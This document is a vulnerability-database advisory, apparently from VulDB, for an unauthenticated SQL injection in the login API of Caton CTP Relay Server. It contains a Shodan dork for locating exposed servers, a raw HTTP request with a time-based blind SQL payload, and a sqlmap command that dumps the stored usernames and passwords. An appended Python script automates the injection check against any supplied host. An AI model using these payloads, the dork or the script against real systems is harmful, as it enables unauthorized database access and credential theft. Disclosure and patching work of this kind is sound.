| Title | Caton CTP Relay Server unknown version - SQL Injection Unauthenticated |
|---|
| Description | # Exploit Title: Caton CTP Relay Server unknown version - SQL Injection Unauthenticated
# Date: 2023-04-21
# Exploit Author: MrEmpy
# Version: unknown
# Shodan Dork: http.favicon.hash:-940032039 title:"Caton CTP Relay Server"
Title:
================
Caton CTP Relay Server unknown version - SQL Injection Unauthenticated
Summary:
================
An unauthenticated SQL injection vulnerability has been found in the Caton CTP Relay Server product (version unknown). It allows an attacker to execute arbitrary SQL commands against the application's underlying database, which could result in unauthorized disclosure of sensitive information such as user credentials and other data stored there.
The vulnerability is in the login endpoint "/server/api/v1/login", where users submit their access credentials. The vulnerable parameters are "username" and "password", which are sent as a JSON object in the POST body.
The values of both parameters are placed into the backend SQL query without proper validation or parameterization, so SQL injected into either of them is executed by the database. This allows the attacker to run commands against the system's database, such as retrieving confidential information or manipulating data.
This vulnerability requires no authentication: the injection point is the login request itself, so anyone who can reach the endpoint can exploit it without valid system credentials.
Severity Level:
================
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Note: this vector scores confidentiality impact only (C:H/I:N/A:N); if the injection also permits data modification as described above, the Integrity metric would be High as well and the score correspondingly higher.
Affected Product:
================
Caton CTP Relay Server unknown version
Proof of Concept:
================
Request:
POST /server/api/v1/login HTTP/1.1
Host: target
Content-Length: 117
Accept: application/json, text/plain, */*
Accept-Language: en
X-Access-Token:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: application/json
Origin: http://target
Referer: http://target/login
Accept-Encoding: gzip, deflate
Connection: close
{"username":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR","password":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR"}
This is a time-based blind payload: on MySQL, now()=sysdate() evaluates as true, so sleep(10) runs and a vulnerable target delays its response by roughly 10 seconds. A response that returns immediately (with the usual failed-login error) indicates the endpoint is not injectable this way.
SQLMap command: sqlmap -u 'http://target/server/api/v1/login' --data='{"username":"3xpl","password":"3xpl"}' -p username --risk 3 --level 5 --batch --random-agent --dbms=MySQL --technique=B --threads=10 -D rrsWeb -T users -C username,password --dump
Note that the manual PoC is time-based (sqlmap technique T) while the command above restricts sqlmap to boolean-based blind (--technique=B); if boolean detection fails, use --technique=BT so the time-based payload is also tried. |
|---|
| Source | ⚠️ .. |
|---|
| User | mrempy (UID 24379) |
|---|
| Submission | 04/21/2023 07:16 (3 years ago) |
|---|
| Moderation | 05/04/2023 17:56 (13 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 228010 [Caton CTP Relay Server 1.2.9 API /server/api/v1/login username/password sql injection] |
|---|
| Points | 17 |
|---|
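The following script is an added example, not part of the original advisory or of the Caton product: it automates the time-based check that the PoC request above performs by hand, sending the advisory's payload in the "username" or "password" field of the JSON login body and comparing the round-trip time against a benign request. The base URL, the timing thresholds, and the request headers are assumptions; the endpoint path and the payload are taken from the advisory.

```python
import json
import time
import urllib.error
import urllib.request

# Endpoint path from the advisory; the host is supplied by the caller.
LOGIN_PATH = "/server/api/v1/login"


def time_based_payload(delay: int) -> str:
    """The advisory's payload: on MySQL now()=sysdate() is true when evaluated,
    so sleep(delay) runs and the response is held for about `delay` seconds."""
    return f"3xpl'XOR(if(now()=sysdate(),sleep({delay}),0))XOR"


def login_body(username: str, password: str) -> bytes:
    """JSON body in the shape the login endpoint expects (no whitespace, as in the PoC)."""
    return json.dumps({"username": username, "password": password},
                      separators=(",", ":")).encode()


def http_post_seconds(base_url: str, body: bytes, timeout: float = 30.0) -> float:
    """Send one login POST and return the round-trip time in seconds.
    An HTTP error status (e.g. 401 for bad credentials) or a socket timeout
    still counts as a timed response; headers are an assumption."""
    req = urllib.request.Request(
        base_url + LOGIN_PATH, data=body, method="POST",
        headers={"Content-Type": "application/json", "Accept": "application/json"})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.URLError:  # HTTPError is a subclass, so 4xx/5xx land here too
        pass
    return time.monotonic() - start


def is_time_based_injectable(send, delay: int = 10, rounds: int = 3,
                             field: str = "username") -> bool:
    """Decide whether `field` is time-based injectable using `send(body) -> seconds`.
    Reports vulnerable only if every injected request is delayed by at least 80% of
    `delay` beyond the slowest benign request, so one slow round-trip on the
    network does not produce a false positive (thresholds are assumptions)."""
    baseline = max(send(login_body("3xpl", "3xpl")) for _ in range(rounds))
    creds = {"username": "3xpl", "password": "3xpl"}
    creds[field] = time_based_payload(delay)
    injected = login_body(creds["username"], creds["password"])
    for _ in range(rounds):
        if send(injected) - baseline < 0.8 * delay:
            return False
    return True


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://target"  # assumed host
    for field in ("username", "password"):
        verdict = is_time_based_injectable(lambda body: http_post_seconds(target, body), field=field)
        print(f"{field}: {'vulnerable' if verdict else 'not confirmed'}")
```

Run it as `python3 check.py http://target` against a host you are authorized to test. The detection logic is separated from the HTTP transport so it can be exercised with a fake `send`; with the advisory's payload in both fields, `login_body` produces exactly the 117-byte body shown in the PoC request. On the server side the fix is to pass both values as bound parameters of a prepared statement instead of concatenating them into the SQL string.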